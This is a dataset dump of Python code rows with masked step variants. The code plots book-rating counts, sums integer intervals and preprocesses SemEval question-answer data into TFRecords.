code
stringlengths 13
6.09M
| order_type
stringclasses 2
values | original_example
dict | step_ids
listlengths 1
5
|
|---|---|---|---|
import pandas as pd
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif'] = ['SimHei']
def get_ratings(file_path):
    """Load the Book-Crossing ratings file and plot the rating distribution.

    Reads the semicolon-separated ratings dump, prints a preview, the row
    counts and the rating range, then shows a bar chart of how many ratings
    fall into each distinct score.

    Parameters
    ----------
    file_path : str
        Path to the semicolon-separated BX ratings file.
    """
    # ISBNs may contain non-ASCII characters, so the encoding must be given
    # explicitly when reading the file.
    # pd.read_table is deprecated; read_csv with an explicit sep=';' is the
    # supported equivalent and behaves identically here.
    ratings = pd.read_csv(file_path, header=0,
                          sep=';', encoding='ISO-8859-1')
    print('前5条数据:\n{}\n'.format(ratings.head(5)))
    print('总的数据条数:\n{}\n'.format(ratings.count()))
    # Use the Series min()/max() pair consistently (the original mixed the
    # builtin min() with the Series .max() method).
    print('用户对图书的评分范围:<{},{}>\n'.format(
        ratings['Book-Rating'].min(), ratings['Book-Rating'].max()))
    # Count how many ratings fall into each distinct score value.
    rate_counts = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()
    plt.bar(rate_counts.index, rate_counts.values, tick_label=rate_counts.index)
    # Annotate each bar with its count, slightly above the bar top.
    for x, y in zip(rate_counts.index, rate_counts.values):
        plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)
    plt.xlabel('用户评分')
    plt.ylabel('评分对应的人数')
    plt.title('每种评分下对应的人数统计图')
    plt.show()
if __name__ == "__main__":
    # Script entry point: plot the rating distribution of the Book-Crossing
    # ratings file expected in the current working directory.
    get_ratings(file_path='BX-Book-Ratings.csv')
|
normal
|
{
"blob_id": "be5178f013e639d5179ed1af380dd7a63044bff2",
"index": 5636,
"step-1": "<mask token>\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == '__main__':\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-3": "<mask token>\nplt.rcParams['font.sans-serif'] = ['SimHei']\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == '__main__':\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-4": "import pandas as pd\nimport matplotlib.pyplot as plt\nplt.rcParams['font.sans-serif'] = ['SimHei']\n\n\ndef get_ratings(file_path):\n ratings = pd.read_table(file_path, header=0, sep=';', encoding='ISO-8859-1'\n )\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(min(ratings['Book-Rating']),\n ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y + 1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == '__main__':\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-5": "import pandas as pd\nimport matplotlib.pyplot as plt\n\nplt.rcParams['font.sans-serif'] = ['SimHei']\n\n\ndef get_ratings(file_path):\n # 图书的ISBN中可能包含字符,所以在使用pandas读取文件时,需要指定编码\n ratings = pd.read_table(file_path, header=0,\n sep=';', encoding='ISO-8859-1')\n print('前5条数据:\\n{}\\n'.format(ratings.head(5)))\n print('总的数据条数:\\n{}\\n'.format(ratings.count()))\n print('用户对图书的评分范围:<{},{}>\\n'.format(\n min(ratings['Book-Rating']), ratings['Book-Rating'].max()))\n rateSer = ratings['Book-Rating'].groupby(ratings['Book-Rating']).count()\n plt.bar(rateSer.keys(), rateSer.values, tick_label=rateSer.keys())\n for x, y in zip(rateSer.keys(), rateSer.values):\n plt.text(x, y+1, '%.0f' % y, ha='center', va='bottom', fontsize=9)\n plt.xlabel('用户评分')\n plt.ylabel('评分对应的人数')\n plt.title('每种评分下对应的人数统计图')\n plt.show()\n\n\nif __name__ == \"__main__\":\n get_ratings(file_path='BX-Book-Ratings.csv')\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def sumIntervals(input):
    """Return the total length covered by a list of [start, end) intervals.

    Overlapping intervals are counted only once.  An empty list yields 0.
    Any malformed entry (not exactly two elements, or start not strictly
    below end) yields the sentinel value 1 — behaviour kept from the
    original implementation.
    """
    if not input:
        return 0
    covered = set()
    for pair in input:
        if len(pair) != 2 or pair[0] >= pair[1]:
            # Malformed interval: report the error sentinel immediately.
            return 1
        covered.update(range(pair[0], pair[1]))
    return len(covered)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def sumIntervals(input):
    """Sum the sizes of [start, end) integer intervals, counting overlaps once.

    Returns 0 for an empty argument.  Any malformed entry (wrong arity, or
    start >= end) returns the sentinel 1, matching the original behaviour.
    """
    if len(input) == 0:
        return 0
    points = set()
    for entry in input:
        valid = len(entry) == 2 and entry[0] < entry[1]
        if not valid:
            return 1
        for point in range(entry[0], entry[1]):
            points.add(point)
    return len(points)


sumIntervals([[1, 2], [6, 10], [11, 15]])
|
flexible
|
{
"blob_id": "25434fccff4401df2cebc9b0c4d0231f056b4e81",
"index": 6346,
"step-1": "<mask token>\n",
"step-2": "def sumIntervals(input):\n interval = set()\n if len(input) > 0:\n for data in input:\n if len(data) == 2 and data[0] < data[1]:\n for i in range(data[0], data[1]):\n interval.add(i)\n else:\n return 1\n return len(interval)\n else:\n return 0\n\n\n<mask token>\n",
"step-3": "def sumIntervals(input):\n interval = set()\n if len(input) > 0:\n for data in input:\n if len(data) == 2 and data[0] < data[1]:\n for i in range(data[0], data[1]):\n interval.add(i)\n else:\n return 1\n return len(interval)\n else:\n return 0\n\n\nsumIntervals([[1, 2], [6, 10], [11, 15]])\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import tensorflow as tf
import random
from tqdm import tqdm
import spacy
import ujson as json
from collections import Counter
import numpy as np
import os.path
nlp = spacy.blank("en")
def word_tokenize(sent):
    """Tokenize *sent* with the module-level blank spaCy pipeline.

    Returns the token surface strings in order.
    """
    return [tok.text for tok in nlp(sent)]
def convert_idx(text, tokens):
    """Map each token to its (start, end) character span inside *text*.

    Tokens are located left-to-right with ``str.find`` starting from the end
    of the previous match, so repeated tokens resolve to successive
    occurrences.

    Parameters
    ----------
    text : str
        The original, untokenized string.
    tokens : list[str]
        Tokens in the order they appear in *text*.

    Returns
    -------
    list[tuple[int, int]]
        Half-open character spans, one per token.

    Raises
    ------
    ValueError
        If a token cannot be located in *text*.  (Replaces the original
        print-then-bare-``Exception`` pattern; ``ValueError`` is still caught
        by any ``except Exception`` handler, so callers are unaffected.)
    """
    current = 0
    spans = []
    for token in tokens:
        current = text.find(token, current)
        if current < 0:
            raise ValueError("Token {} cannot be found".format(token))
        spans.append((current, current + len(token)))
        current += len(token)
    return spans
def process_file(filename, data_type, word_counter, char_counter, shuffle=False):
    """Read a TSV file of (question, answer, label) lines into example dicts.

    Side effects: increments *word_counter* (with lowercased tokens) and
    *char_counter* for every token of both the question and the answer.

    Parameters
    ----------
    filename : str
        Path to a tab-separated file with columns question, answer, label.
    data_type : str
        Split name used only in progress messages (e.g. "train").
    word_counter, char_counter : collections.Counter
        Mutated in place with token / character frequencies.
    shuffle : bool
        Whether to shuffle the examples before returning them.

    Returns
    -------
    list[dict]
        One dict per input line carrying token and character lists, the
        integer label under ``"y"`` and a 1-based ``"id"``.
    """
    print("Generating {} examples...".format(data_type))
    examples = []
    total = 0
    with open(filename, "r") as fh:
        for l in fh:
            ques, ans, label = l.strip().split("\t")
            ques_tokens = word_tokenize(ques)
            ques_chars = [list(token) for token in ques_tokens]
            ans_tokens = word_tokenize(ans)
            ans_chars = [list(token) for token in ans_tokens]
            total += 1
            for token in ques_tokens:
                word_counter[token.lower()] += 1
                for char in token:
                    char_counter[char] += 1
            for token in ans_tokens:
                word_counter[token.lower()] += 1
                for char in token:
                    char_counter[char] += 1
            examples.append({
                "ans_tokens": ans_tokens,
                "ans_chars": ans_chars,
                "ques_tokens": ques_tokens,
                "ques_chars": ques_chars,
                "y": int(label),
                "id": total,
            })
    # BUG FIX: the original tested ``if random:`` — the *module* object, which
    # is always truthy — so every call shuffled regardless of the flag.  Honor
    # the ``shuffle`` parameter instead.
    if shuffle:
        random.shuffle(examples)
    print("{} questions in total".format(len(examples)))
    return examples
def get_embedding(counter, data_type, limit=-1, emb_file=None, size=None, vec_size=None, token2idx_dict=None):
    """Build an embedding matrix and token->index mapping for *counter*.

    Tokens occurring more than *limit* times either receive their pretrained
    vector from *emb_file* or, when no file is given, a small random vector.
    Index 0 is reserved for the NULL padding token and index 1 for OOV; both
    map to zero vectors.

    Returns a ``(emb_mat, token2idx_dict)`` pair where ``emb_mat[i]`` is the
    vector for the token mapped to index ``i``.
    """
    print("Generating {} embedding...".format(data_type))
    embedding_dict = {}
    frequent = [tok for tok, cnt in counter.items() if cnt > limit]
    if emb_file is not None:
        assert size is not None
        assert vec_size is not None
        # Pretrained file: each line is "<word pieces...> <vec_size floats>";
        # the word itself may contain spaces, so rejoin everything before the
        # final vec_size fields.
        with open(emb_file, "r", encoding="utf-8") as fh:
            for line in tqdm(fh, total=size):
                fields = line.split()
                word = "".join(fields[:-vec_size])
                if word in counter and counter[word] > limit:
                    embedding_dict[word] = [float(v) for v in fields[-vec_size:]]
        print("{} / {} tokens have corresponding {} embedding vector".format(
            len(embedding_dict), len(frequent), data_type))
    else:
        assert vec_size is not None
        # No pretrained file: draw small random vectors for frequent tokens.
        for tok in frequent:
            embedding_dict[tok] = [np.random.normal(scale=0.01) for _ in range(vec_size)]
        print("{} tokens have corresponding embedding vector".format(len(frequent)))
    NULL = "--NULL--"
    OOV = "--OOV--"
    # Real tokens start at index 2; 0 and 1 are reserved below.
    if token2idx_dict is None:
        token2idx_dict = {tok: idx for idx, tok in enumerate(embedding_dict.keys(), 2)}
    token2idx_dict[NULL] = 0
    token2idx_dict[OOV] = 1
    embedding_dict[NULL] = [0.0] * vec_size
    embedding_dict[OOV] = [0.0] * vec_size
    idx2emb_dict = {idx: embedding_dict[tok] for tok, idx in token2idx_dict.items()}
    emb_mat = [idx2emb_dict[idx] for idx in range(len(idx2emb_dict))]
    return emb_mat, token2idx_dict
def build_features_SemEval(config, examples, data_type, out_file, word2idx_dict, char2idx_dict, is_test=False):
    """Serialize *examples* to *out_file* as TFRecords of padded index arrays.

    Each record carries the answer/question word indices, per-token character
    indices, the float label ``y`` and the example ``id``, with the numpy
    arrays stored as raw byte strings.

    Returns a meta dict holding the number of records written under "total".
    """
    # Sequence limits differ between train and test configurations.
    ans_limit = config.test_para_limit if is_test else config.para_limit
    ques_limit = config.test_ques_limit if is_test else config.ques_limit
    char_limit = config.char_limit
    def filter_func(example, is_test=False):
        # True when either side exceeds its length limit.  NOTE(review): the
        # call site below is commented out, so over-long examples are
        # truncated by the slicing further down rather than dropped.
        return len(example["ans_tokens"]) > ans_limit or len(example["ques_tokens"]) > ques_limit
    print("Processing {} examples...".format(data_type))
    writer = tf.python_io.TFRecordWriter(out_file)
    total = 0
    total_ = 0
    meta = {}
    for example in tqdm(examples):
        total_ += 1
        #if filter_func(example, is_test):
        #    continue
        total += 1
        # Zero-padded index buffers; 0 is the NULL/padding index.
        context_idxs = np.zeros([ans_limit], dtype=np.int32)
        context_char_idxs = np.zeros([ans_limit, char_limit], dtype=np.int32)
        ques_idxs = np.zeros([ques_limit], dtype=np.int32)
        ques_char_idxs = np.zeros([ques_limit, char_limit], dtype=np.int32)
        y = 0
        def _get_word(word):
            # Try several casings before falling back to the OOV index (1).
            for each in (word, word.lower(), word.capitalize(), word.upper()):
                if each in word2idx_dict:
                    return word2idx_dict[each]
            return 1
        def _get_char(char):
            # Unknown characters map to the OOV index (1).
            if char in char2idx_dict:
                return char2idx_dict[char]
            return 1
        # Fill word indices, truncating to the configured limits.
        for i, token in enumerate(example["ans_tokens"][:ans_limit]):
            context_idxs[i] = _get_word(token)
        for i, token in enumerate(example["ques_tokens"][:ques_limit]):
            ques_idxs[i] = _get_word(token)
        # Fill character indices, truncating each token to char_limit chars.
        for i, token in enumerate(example["ans_chars"][:ans_limit]):
            for j, char in enumerate(token):
                if j == char_limit:
                    break
                context_char_idxs[i, j] = _get_char(char)
        for i, token in enumerate(example["ques_chars"][:ques_limit]):
            for j, char in enumerate(token):
                if j == char_limit:
                    break
                ques_char_idxs[i, j] = _get_char(char)
        label = example["y"]
        y = float(label)
        # Arrays are serialized as raw bytes; the reader must know the dtype
        # and shape to reconstruct them.
        record = tf.train.Example(features=tf.train.Features(feature={
            "ans_idxs": tf.train.Feature(bytes_list=tf.train.BytesList(value=[context_idxs.tostring()])),
            "ques_idxs": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ques_idxs.tostring()])),
            "ans_char_idxs": tf.train.Feature(bytes_list=tf.train.BytesList(value=[context_char_idxs.tostring()])),
            "ques_char_idxs": tf.train.Feature(bytes_list=tf.train.BytesList(value=[ques_char_idxs.tostring()])),
            "y": tf.train.Feature(bytes_list=tf.train.BytesList(value=[np.array([y]).tostring()])),
            "id": tf.train.Feature(int64_list=tf.train.Int64List(value=[example["id"]]))
        }))
        writer.write(record.SerializeToString())
    print("Build {} / {} instances of features in total".format(total, total_))
    meta["total"] = total
    writer.close()
    return meta
def save(filename, obj, message=None):
    """Serialize *obj* as JSON into *filename*.

    When *message* is given, a "Saving <message>..." progress line is
    printed first.
    """
    if message is not None:
        print("Saving {}...".format(message))
    with open(filename, "w") as out:
        json.dump(obj, out)
def preproSemEval(config):
    """Run the full SemEval preprocessing pipeline described by *config*.

    Reads the train/dev/test files, builds shared word/char vocabularies and
    embedding matrices (re-using existing word2idx/char2idx JSON files when
    present on disk), writes TFRecord feature files for each split, and
    saves every artifact to the paths named in *config*.
    """
    # Counters are shared so frequencies accumulate across all three splits.
    word_counter, char_counter = Counter(), Counter()
    train_examples = process_file(
        config.SemEval_train_file, "train", word_counter, char_counter, shuffle=True)
    dev_examples = process_file(
        config.SemEval_dev_file, "dev", word_counter, char_counter)
    test_examples = process_file(
        config.SemEval_test_file, "test", word_counter, char_counter)
    # Choose embedding sources/sizes from the config flags.
    word_emb_file = config.fasttext_file if config.fasttext else config.glove_word_file
    char_emb_file = config.glove_char_file if config.pretrained_char else None
    char_emb_size = config.glove_char_size if config.pretrained_char else None
    char_emb_dim = config.glove_dim if config.pretrained_char else config.char_dim
    # Reuse a previously saved word index if one exists on disk.
    word2idx_dict = None
    if os.path.isfile(config.word2idx_file):
        with open(config.word2idx_file, "r") as fh:
            word2idx_dict = json.load(fh)
    word_emb_mat, word2idx_dict = get_embedding(word_counter, "word", emb_file=word_emb_file,
                                                size=config.glove_word_size, vec_size=config.glove_dim, token2idx_dict=word2idx_dict)
    # Same reuse logic for the character index.
    char2idx_dict = None
    if os.path.isfile(config.char2idx_file):
        with open(config.char2idx_file, "r") as fh:
            char2idx_dict = json.load(fh)
    char_emb_mat, char2idx_dict = get_embedding(
        char_counter, "char", emb_file=char_emb_file, size=char_emb_size, vec_size=char_emb_dim, token2idx_dict=char2idx_dict)
    # Write TFRecord feature files for each split.
    build_features_SemEval(config, train_examples, "train",
                           config.train_record_file, word2idx_dict, char2idx_dict)
    dev_meta = build_features_SemEval(config, dev_examples, "dev",
                                      config.dev_record_file, word2idx_dict, char2idx_dict)
    test_meta = build_features_SemEval(config, test_examples, "test",
                                       config.test_record_file, word2idx_dict, char2idx_dict, is_test=True)
    # Persist all artifacts to the configured paths.
    save(config.word_emb_file, word_emb_mat, message="word embedding")
    save(config.char_emb_file, char_emb_mat, message="char embedding")
    save(config.dev_meta, dev_meta, message="dev meta")
    save(config.word2idx_file, word2idx_dict, message="word2idx")
    save(config.char2idx_file, char2idx_dict, message="char2idx")
    save(config.test_meta, test_meta, message="test meta")
    save("data/test.json", dev_examples, message="test example")
|
normal
|
{
"blob_id": "5cd9d4fe9889c4d53b50d86fa78ae84d0c242536",
"index": 3693,
"step-1": "<mask token>\n\n\ndef convert_idx(text, tokens):\n current = 0\n spans = []\n for token in tokens:\n current = text.find(token, current)\n if current < 0:\n print('Token {} cannot be found'.format(token))\n raise Exception()\n spans.append((current, current + len(token)))\n current += len(token)\n return spans\n\n\ndef process_file(filename, data_type, word_counter, char_counter, shuffle=False\n ):\n print('Generating {} examples...'.format(data_type))\n examples = []\n eval_examples = {}\n total = 0\n with open(filename, 'r') as fh:\n for l in fh:\n ques, ans, label = l.strip().split('\\t')\n ques_tokens = word_tokenize(ques)\n ques_chars = [list(token) for token in ques_tokens]\n ans_tokens = word_tokenize(ans)\n ans_chars = [list(token) for token in ans_tokens]\n label = int(label)\n total += 1\n for token in ques_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n for token in ans_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n example = {'ans_tokens': ans_tokens, 'ans_chars': ans_chars,\n 'ques_tokens': ques_tokens, 'ques_chars': ques_chars, 'y':\n label, 'id': total}\n examples.append(example)\n if random:\n random.shuffle(examples)\n print('{} questions in total'.format(len(examples)))\n return examples\n\n\n<mask token>\n\n\ndef build_features_SemEval(config, examples, data_type, out_file,\n word2idx_dict, char2idx_dict, is_test=False):\n ans_limit = config.test_para_limit if is_test else config.para_limit\n ques_limit = config.test_ques_limit if is_test else config.ques_limit\n char_limit = config.char_limit\n\n def filter_func(example, is_test=False):\n return len(example['ans_tokens']) > ans_limit or len(example[\n 'ques_tokens']) > ques_limit\n print('Processing {} examples...'.format(data_type))\n writer = tf.python_io.TFRecordWriter(out_file)\n total = 0\n total_ = 0\n meta = {}\n for example in tqdm(examples):\n total_ += 1\n total += 1\n context_idxs = 
np.zeros([ans_limit], dtype=np.int32)\n context_char_idxs = np.zeros([ans_limit, char_limit], dtype=np.int32)\n ques_idxs = np.zeros([ques_limit], dtype=np.int32)\n ques_char_idxs = np.zeros([ques_limit, char_limit], dtype=np.int32)\n y = 0\n\n def _get_word(word):\n for each in (word, word.lower(), word.capitalize(), word.upper()):\n if each in word2idx_dict:\n return word2idx_dict[each]\n return 1\n\n def _get_char(char):\n if char in char2idx_dict:\n return char2idx_dict[char]\n return 1\n for i, token in enumerate(example['ans_tokens'][:ans_limit]):\n context_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ques_tokens'][:ques_limit]):\n ques_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ans_chars'][:ans_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n context_char_idxs[i, j] = _get_char(char)\n for i, token in enumerate(example['ques_chars'][:ques_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n ques_char_idxs[i, j] = _get_char(char)\n label = example['y']\n y = float(label)\n record = tf.train.Example(features=tf.train.Features(feature={\n 'ans_idxs': tf.train.Feature(bytes_list=tf.train.BytesList(\n value=[context_idxs.tostring()])), 'ques_idxs': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[ques_idxs.tostring\n ()])), 'ans_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[context_char_idxs.tostring()])),\n 'ques_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[ques_char_idxs.tostring()])), 'y': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[np.array([y]).\n tostring()])), 'id': tf.train.Feature(int64_list=tf.train.\n Int64List(value=[example['id']]))}))\n writer.write(record.SerializeToString())\n print('Build {} / {} instances of features in total'.format(total, total_))\n meta['total'] = total\n writer.close()\n return meta\n\n\ndef save(filename, obj, message=None):\n if message is not None:\n print('Saving 
{}...'.format(message))\n with open(filename, 'w') as fh:\n json.dump(obj, fh)\n\n\ndef preproSemEval(config):\n word_counter, char_counter = Counter(), Counter()\n train_examples = process_file(config.SemEval_train_file, 'train',\n word_counter, char_counter, shuffle=True)\n dev_examples = process_file(config.SemEval_dev_file, 'dev',\n word_counter, char_counter)\n test_examples = process_file(config.SemEval_test_file, 'test',\n word_counter, char_counter)\n word_emb_file = (config.fasttext_file if config.fasttext else config.\n glove_word_file)\n char_emb_file = config.glove_char_file if config.pretrained_char else None\n char_emb_size = config.glove_char_size if config.pretrained_char else None\n char_emb_dim = (config.glove_dim if config.pretrained_char else config.\n char_dim)\n word2idx_dict = None\n if os.path.isfile(config.word2idx_file):\n with open(config.word2idx_file, 'r') as fh:\n word2idx_dict = json.load(fh)\n word_emb_mat, word2idx_dict = get_embedding(word_counter, 'word',\n emb_file=word_emb_file, size=config.glove_word_size, vec_size=\n config.glove_dim, token2idx_dict=word2idx_dict)\n char2idx_dict = None\n if os.path.isfile(config.char2idx_file):\n with open(config.char2idx_file, 'r') as fh:\n char2idx_dict = json.load(fh)\n char_emb_mat, char2idx_dict = get_embedding(char_counter, 'char',\n emb_file=char_emb_file, size=char_emb_size, vec_size=char_emb_dim,\n token2idx_dict=char2idx_dict)\n build_features_SemEval(config, train_examples, 'train', config.\n train_record_file, word2idx_dict, char2idx_dict)\n dev_meta = build_features_SemEval(config, dev_examples, 'dev', config.\n dev_record_file, word2idx_dict, char2idx_dict)\n test_meta = build_features_SemEval(config, test_examples, 'test',\n config.test_record_file, word2idx_dict, char2idx_dict, is_test=True)\n save(config.word_emb_file, word_emb_mat, message='word embedding')\n save(config.char_emb_file, char_emb_mat, message='char embedding')\n save(config.dev_meta, dev_meta, message='dev 
meta')\n save(config.word2idx_file, word2idx_dict, message='word2idx')\n save(config.char2idx_file, char2idx_dict, message='char2idx')\n save(config.test_meta, test_meta, message='test meta')\n save('data/test.json', dev_examples, message='test example')\n",
"step-2": "<mask token>\n\n\ndef convert_idx(text, tokens):\n current = 0\n spans = []\n for token in tokens:\n current = text.find(token, current)\n if current < 0:\n print('Token {} cannot be found'.format(token))\n raise Exception()\n spans.append((current, current + len(token)))\n current += len(token)\n return spans\n\n\ndef process_file(filename, data_type, word_counter, char_counter, shuffle=False\n ):\n print('Generating {} examples...'.format(data_type))\n examples = []\n eval_examples = {}\n total = 0\n with open(filename, 'r') as fh:\n for l in fh:\n ques, ans, label = l.strip().split('\\t')\n ques_tokens = word_tokenize(ques)\n ques_chars = [list(token) for token in ques_tokens]\n ans_tokens = word_tokenize(ans)\n ans_chars = [list(token) for token in ans_tokens]\n label = int(label)\n total += 1\n for token in ques_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n for token in ans_tokens:\n word_counter[token.lower()] += 1\n for char in token:\n char_counter[char] += 1\n example = {'ans_tokens': ans_tokens, 'ans_chars': ans_chars,\n 'ques_tokens': ques_tokens, 'ques_chars': ques_chars, 'y':\n label, 'id': total}\n examples.append(example)\n if random:\n random.shuffle(examples)\n print('{} questions in total'.format(len(examples)))\n return examples\n\n\ndef get_embedding(counter, data_type, limit=-1, emb_file=None, size=None,\n vec_size=None, token2idx_dict=None):\n print('Generating {} embedding...'.format(data_type))\n embedding_dict = {}\n filtered_elements = [k for k, v in counter.items() if v > limit]\n if emb_file is not None:\n assert size is not None\n assert vec_size is not None\n with open(emb_file, 'r', encoding='utf-8') as fh:\n for line in tqdm(fh, total=size):\n array = line.split()\n word = ''.join(array[0:-vec_size])\n vector = list(map(float, array[-vec_size:]))\n if word in counter and counter[word] > limit:\n embedding_dict[word] = vector\n print('{} / {} tokens have corresponding {} 
embedding vector'.\n format(len(embedding_dict), len(filtered_elements), data_type))\n else:\n assert vec_size is not None\n for token in filtered_elements:\n embedding_dict[token] = [np.random.normal(scale=0.01) for _ in\n range(vec_size)]\n print('{} tokens have corresponding embedding vector'.format(len(\n filtered_elements)))\n NULL = '--NULL--'\n OOV = '--OOV--'\n token2idx_dict = {token: idx for idx, token in enumerate(embedding_dict\n .keys(), 2)} if token2idx_dict is None else token2idx_dict\n token2idx_dict[NULL] = 0\n token2idx_dict[OOV] = 1\n embedding_dict[NULL] = [(0.0) for _ in range(vec_size)]\n embedding_dict[OOV] = [(0.0) for _ in range(vec_size)]\n idx2emb_dict = {idx: embedding_dict[token] for token, idx in\n token2idx_dict.items()}\n emb_mat = [idx2emb_dict[idx] for idx in range(len(idx2emb_dict))]\n return emb_mat, token2idx_dict\n\n\ndef build_features_SemEval(config, examples, data_type, out_file,\n word2idx_dict, char2idx_dict, is_test=False):\n ans_limit = config.test_para_limit if is_test else config.para_limit\n ques_limit = config.test_ques_limit if is_test else config.ques_limit\n char_limit = config.char_limit\n\n def filter_func(example, is_test=False):\n return len(example['ans_tokens']) > ans_limit or len(example[\n 'ques_tokens']) > ques_limit\n print('Processing {} examples...'.format(data_type))\n writer = tf.python_io.TFRecordWriter(out_file)\n total = 0\n total_ = 0\n meta = {}\n for example in tqdm(examples):\n total_ += 1\n total += 1\n context_idxs = np.zeros([ans_limit], dtype=np.int32)\n context_char_idxs = np.zeros([ans_limit, char_limit], dtype=np.int32)\n ques_idxs = np.zeros([ques_limit], dtype=np.int32)\n ques_char_idxs = np.zeros([ques_limit, char_limit], dtype=np.int32)\n y = 0\n\n def _get_word(word):\n for each in (word, word.lower(), word.capitalize(), word.upper()):\n if each in word2idx_dict:\n return word2idx_dict[each]\n return 1\n\n def _get_char(char):\n if char in char2idx_dict:\n return 
char2idx_dict[char]\n return 1\n for i, token in enumerate(example['ans_tokens'][:ans_limit]):\n context_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ques_tokens'][:ques_limit]):\n ques_idxs[i] = _get_word(token)\n for i, token in enumerate(example['ans_chars'][:ans_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n context_char_idxs[i, j] = _get_char(char)\n for i, token in enumerate(example['ques_chars'][:ques_limit]):\n for j, char in enumerate(token):\n if j == char_limit:\n break\n ques_char_idxs[i, j] = _get_char(char)\n label = example['y']\n y = float(label)\n record = tf.train.Example(features=tf.train.Features(feature={\n 'ans_idxs': tf.train.Feature(bytes_list=tf.train.BytesList(\n value=[context_idxs.tostring()])), 'ques_idxs': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[ques_idxs.tostring\n ()])), 'ans_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[context_char_idxs.tostring()])),\n 'ques_char_idxs': tf.train.Feature(bytes_list=tf.train.\n BytesList(value=[ques_char_idxs.tostring()])), 'y': tf.train.\n Feature(bytes_list=tf.train.BytesList(value=[np.array([y]).\n tostring()])), 'id': tf.train.Feature(int64_list=tf.train.\n Int64List(value=[example['id']]))}))\n writer.write(record.SerializeToString())\n print('Build {} / {} instances of features in total'.format(total, total_))\n meta['total'] = total\n writer.close()\n return meta\n\n\ndef save(filename, obj, message=None):\n if message is not None:\n print('Saving {}...'.format(message))\n with open(filename, 'w') as fh:\n json.dump(obj, fh)\n\n\ndef preproSemEval(config):\n word_counter, char_counter = Counter(), Counter()\n train_examples = process_file(config.SemEval_train_file, 'train',\n word_counter, char_counter, shuffle=True)\n dev_examples = process_file(config.SemEval_dev_file, 'dev',\n word_counter, char_counter)\n test_examples = process_file(config.SemEval_test_file, 'test',\n word_counter, char_counter)\n 
